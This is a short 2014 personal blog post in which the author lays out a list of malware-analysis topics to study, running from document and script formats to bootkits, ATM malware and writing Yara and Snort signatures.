Wednesday, November 19, 2014

Deeper dive - Malware analysis :)

I've not been blogging for a while..sadly, but I've been learning quite a few things over the last few months and in general continue to keep getting better slowly at reversing and malware analysis - something I always enjoy doing :)

So now that I know much more about reversing than I did a few years ago, I've decided to get deeper into malware analysis: debug all the different types of malware that turn up over a period of time and learn ways of analyzing all of them.

So I made a list of topics that I'd like to learn over the next few months. I'm familiar with quite a few of them - but not all of them. It probably isn't comprehensive nor do I claim it is - but it's a nice starting point for me. Also, as I learn new things - small or big - I am going to be posting all of that regularly.

So, here's my list :) - do suggest other stuff that you feel could potentially be important and is different from the rest.
  • Disk monitoring
  • Network monitoring
  • Docx
  • VBA
  • Powershell
  • AutoIT
  • PDF
  • DLL
  • JS
  • PHP
  • ELF
  • Flash
  • Packed executables
  • Routers
  • POS
  • Memory analysis (Volatility)
  • Credit card extractors
  • ATM
  • Virtual Machine detection
  • Bootkits
  • Exploit Kits
  • Steganography
  • Learn to write better signatures (Clamav, Yara, Snort, Suricata)